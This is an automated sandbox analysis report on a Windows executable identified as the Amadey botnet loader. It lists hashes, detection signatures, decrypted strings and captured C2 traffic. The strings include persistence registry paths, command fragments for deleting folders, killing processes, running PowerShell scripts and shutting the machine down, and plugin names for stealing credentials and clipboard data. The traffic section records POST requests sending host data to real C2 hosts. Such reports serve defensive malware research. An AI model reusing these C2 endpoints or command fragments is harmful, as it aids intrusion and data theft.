Windows Analysis Report
oTIHRjz4dn.exe

Overview

General Information

Sample name: oTIHRjz4dn.exe
renamed because original name is a hash value
Original sample name: CC9B99CBE81EB73C242AEE7507B24206.exe
Analysis ID: 1432635
MD5: cc9b99cbe81eb73c242aee7507b24206
SHA1: b237cbe8a53534b73f1624213fded9fd67258e37
SHA256: 8939a6a2ab0924c21b0ee812340da080dccd3396b5a698f06740aa2f49ff9bf7
Tags: Amadeyexe
Infos:

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadey
Yara detected Amadeys stealer DLL
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: oTIHRjz4dn.exe Avira: detected
Found malware configuration
Source: oTIHRjz4dn.exe Malware Configuration Extractor: Amadey {"C2 url": "greatnessappreviews.com/8BvxwQdec3/index.php", "Version": "4.19"}
Multi AV Scanner detection for domain / URL
Source: rtattack.xycydau0.fun Virustotal: Detection: 5% Perma Link
Multi AV Scanner detection for submitted file
Source: oTIHRjz4dn.exe Virustotal: Detection: 57% Perma Link
Source: oTIHRjz4dn.exe ReversingLabs: Detection: 71%
Machine Learning detection for sample
Source: oTIHRjz4dn.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: greatnessappreviews.com
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: /8BvxwQdec3/index.php
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: S-%lu-
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: 3d37ae315d
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Dctooux.exe
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Startup
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: cmd /C RMDIR /s/q
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: rundll32
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Programs
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: %USERPROFILE%
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: cred.dll|clip.dll|
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: http://
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: https://
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: /Plugins/
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: &unit=
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: shell32.dll
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: kernel32.dll
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: GetNativeSystemInfo
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: ProgramData\
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: AVAST Software
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Kaspersky Lab
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Panda Security
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Doctor Web
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: 360TotalSecurity
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Bitdefender
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Norton
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Sophos
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Comodo
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: WinDefender
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: 0123456789
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: ------
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: ?scr=1
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: ComputerName
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: -unicode-
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: VideoID
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: DefaultSettings.XResolution
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: DefaultSettings.YResolution
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: ProductName
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: CurrentBuild
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: rundll32.exe
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: "taskkill /f /im "
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: " && timeout 1 && del
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: && Exit"
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: " && ren
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: Powershell.exe
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: -executionpolicy remotesigned -File "
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: shutdown -s -t 0
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: random
Source: 0.0.oTIHRjz4dn.exe.800000.0.unpack String decryptor: >0b*j'
Uses 32bit PE files
Source: oTIHRjz4dn.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: oTIHRjz4dn.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49735 -> 45.156.23.149:80
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49738 -> 45.156.23.149:80
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 45.156.23.149:80 -> 192.168.2.4:49738
Source: Traffic Snort IDS: 2044623 ET TROJAN Amadey Bot Activity (POST) 192.168.2.4:49752 -> 45.156.23.149:80
Source: Traffic Snort IDS: 2044623 ET TROJAN Amadey Bot Activity (POST) 192.168.2.4:49757 -> 45.156.23.149:80
Source: Traffic Snort IDS: 2044623 ET TROJAN Amadey Bot Activity (POST) 192.168.2.4:49763 -> 45.156.23.149:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: greatnessappreviews.com/8BvxwQdec3/index.php
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4OTU=Host: greatnessappreviews.comContent-Length: 85047Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4OTU=Host: greatnessappreviews.comContent-Length: 85047Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4OTU=Host: greatnessappreviews.comContent-Length: 85047Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4OTU=Host: greatnessappreviews.comContent-Length: 85047Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 35 30 38 39 32 32 43 37 30 41 37 36 36 35 39 43 42 34 36 41 36 34 33 43 35 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 34 44 34 43 32 31 31 35 30 37 30 46 45 41 37 35 39 36 46 36 34 35 37 39 45 43 38 42 32 34 38 32 41 42 41 45 36 43 38 31 31 38 35 36 46 30 30 35 41 45 30 37 38 45 35 35 31 37 39 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34508922C70A76659CB46A643C5D58C48CF8B295278F7EBCB075A9634F4D4C2115070FEA7596F64579EC8B2482ABAE6C811856F005AE078E55179
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUyMDU=Host: greatnessappreviews.comContent-Length: 85357Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4OTU=Host: greatnessappreviews.comContent-Length: 85047Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 31 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000154001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 31 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000154001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4OTU=Host: greatnessappreviews.comContent-Length: 85047Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4OTU=Host: greatnessappreviews.comContent-Length: 85047Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 31 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000154001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4NzY=Host: greatnessappreviews.comContent-Length: 85028Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 34 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000427001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4NzY=Host: greatnessappreviews.comContent-Length: 85028Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 34 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000427001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4NzY=Host: greatnessappreviews.comContent-Length: 85028Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4NzY=Host: greatnessappreviews.comContent-Length: 85028Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 35 30 38 39 32 32 43 37 30 41 37 36 36 35 39 43 42 34 36 41 36 34 33 43 35 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 34 44 34 43 32 31 31 35 30 37 30 46 45 41 37 35 39 36 46 36 34 35 37 39 45 43 38 42 32 34 38 32 41 42 41 45 36 43 38 31 31 38 35 36 46 30 30 35 41 45 30 37 38 45 35 35 31 37 39 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34508922C70A76659CB46A643C5D58C48CF8B295278F7EBCB075A9634F4D4C2115070FEA7596F64579EC8B2482ABAE6C811856F005AE078E55179
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 35 30 38 39 32 32 43 37 30 41 37 36 36 35 39 43 42 34 36 41 36 34 33 43 35 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 34 44 34 43 32 31 31 35 30 37 30 46 45 41 37 35 39 36 46 36 34 35 37 39 45 43 38 42 32 34 38 32 41 42 41 45 36 43 38 31 31 38 35 36 46 30 30 35 41 45 30 37 38 45 35 35 31 37 39 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34508922C70A76659CB46A643C5D58C48CF8B295278F7EBCB075A9634F4D4C2115070FEA7596F64579EC8B2482ABAE6C811856F005AE078E55179
Source: global traffic HTTP traffic detected: POST /8BvxwQdec3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: greatnessappreviews.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 35 30 38 39 32 32 43 37 30 41 37 36 36 35 39 43 42 34 36 41 36 34 33 43 35 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 34 44 34 43 32 31 31 35 30 37 30 46 45 41 37 35 39 36 46 36 34 35 37 39 45 43 38 42 32 34 38 32 41 42 41 45 36 43 38 31 31 38 35 36 46 30 30 35 41 45 30 37 38 45 35 35 31 37 39 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34508922C70A76659CB46A643C5D58C48CF8B295278F7EBCB075A9634F4D4C2115070FEA7596F64579EC8B2482ABAE6C811856F005AE078E55179
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDBACKBONERU CLOUDBACKBONERU
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.199.237
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.199.237
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.199.237
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.199.237
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.199.237
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.199.237
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.199.237
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: greatnessappreviews.com
Source: global traffic DNS traffic detected: DNS query: rtattack.xycydau0.fun
Source: unknown HTTP traffic detected: POST /8BvxwQdec3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODQ4OTU=Host: greatnessappreviews.comContent-Length: 85047Cache-Control: no-cache
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://greatnessappreviews.com/
Source: oTIHRjz4dn.exe, 00000000.00000003.1707871130.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.php
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1707871130.00000000012FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.php5
Source: oTIHRjz4dn.exe, 00000000.00000003.1707871130.0000000001310000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.0000000001310000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.php?scr=1
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.0000000001310000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.php?scr=1N8
Source: oTIHRjz4dn.exe, 00000000.00000003.1707871130.0000000001310000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.0000000001310000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.php?scr=1n8
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.phpO
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.phpQ
Source: oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://greatnessappreviews.com/8BvxwQdec3/index.phpny
Uses 32bit PE files
Source: oTIHRjz4dn.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.winEXE@1/1@4/2
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Mutant created: \Sessions\1\BaseNamedObjects\f5a43204a66445ad0e09c0db80eb910b
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe File created: C:\Users\user\AppData\Local\Temp\246122658369 Jump to behavior
Source: oTIHRjz4dn.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: oTIHRjz4dn.exe Virustotal: Detection: 57%
Source: oTIHRjz4dn.exe ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: oTIHRjz4dn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: oTIHRjz4dn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: oTIHRjz4dn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: oTIHRjz4dn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: oTIHRjz4dn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: oTIHRjz4dn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: oTIHRjz4dn.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: oTIHRjz4dn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: oTIHRjz4dn.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: oTIHRjz4dn.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: oTIHRjz4dn.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: oTIHRjz4dn.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: oTIHRjz4dn.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
PE file contains sections with non-standard names
Source: oTIHRjz4dn.exe Static PE information: section name: gin
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Window / User API: threadDelayed 3552 Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Window / User API: threadDelayed 6202 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe TID: 6956 Thread sleep time: -106560000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe TID: 7032 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe TID: 6956 Thread sleep time: -186060000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Thread delayed: delay time: 30000 Jump to behavior
Source: oTIHRjz4dn.exe, 00000000.00000003.1707871130.00000000012E4000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.00000000012E4000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1707871130.0000000001310000.00000004.00000020.00020000.00000000.sdmp, oTIHRjz4dn.exe, 00000000.00000003.1746459480.0000000001310000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\Desktop\oTIHRjz4dn.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000154001\clip.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\oTIHRjz4dn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation Jump to behavior
